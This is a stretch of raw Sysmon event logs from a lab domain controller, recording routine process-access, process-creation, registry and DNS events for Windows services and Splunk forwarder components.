14:07:48.766{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:48.766{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9634-6005-7805-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9634-6005-7805-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.766{59A5CD1D-9634-6005-7805-00000000A301}6552C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.250{59A5CD1D-9634-6005-7705-00000000A301}45646728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.098{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9634-6005-7705-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.097{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:48.096{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.096{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:48.096{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.096{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9634-6005-7705-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.096{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9634-6005-7705-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:48.095{59A5CD1D-9634-6005-7705-00000000A301}4564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9635-6005-7905-00000000A301}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:49.485{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:07:49.485{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9635-6005-7905-00000000A301}5320C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9635-6005-7905-00000000A301}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:07:49.485{59A5CD1D-9635-6005-7905-00000000A301}5320C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:18.561{59A5CD1D-8E44-6005-0B00-00000000A301}8561060C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x800000000000000019152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1101SetValue2021-01-18 14:08:18.452{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\CachedMachineNames\NameUserPrincipalWIN-DC-495$@attackrange.local 22542200x800000000000000019154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:18.481{59A5CD1D-8E46-6005-1400-00000000A301}1304win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 10341000x800000000000000019157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:36.717{59A5CD1D-8E46-6005-1400-00000000A301}13042324C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:08:36.717{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:36.717{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:08:44.560{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-966C-6005-7A05-00000000A301}4832C:\Program 
